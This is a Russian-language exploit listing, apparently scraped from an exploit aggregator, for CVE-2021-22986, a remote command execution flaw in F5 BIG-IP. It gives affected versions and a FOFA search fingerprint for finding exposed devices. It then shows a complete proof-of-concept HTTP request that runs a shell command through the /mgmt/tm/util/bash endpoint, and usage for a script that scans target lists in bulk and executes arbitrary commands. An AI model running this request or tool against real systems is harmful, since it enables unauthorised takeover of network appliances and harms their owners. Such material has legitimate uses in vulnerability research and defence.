## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YAUNSKY-CVE-202122986-EXP
# Уязвимость удалённого выполнения команд в F5 BIG-IP (CVE-2021-22986)
## Затронутые версии
F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2
## fofa
icon_hash="-335242539"
## POC
root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
## Использование скрипта
python3 CVE202122986.py --help
root@kitploit:~
Usage: CVE202122986.py [OPTIONS]
Options:
-u, --url TEXT Целевой URL — проверка одной цели; Пример: python3 CVE202122986.py -u https://ip:port
-f, --file TEXT Целевой файл — пакетная проверка целей; Пример: python3 CVE202122986.py -f ip.txt
-c, --cmd TEXT Целевая команда — выполнение команды; Пример: python3 CVE202122986.py -cmd id
--help Show this message and exit.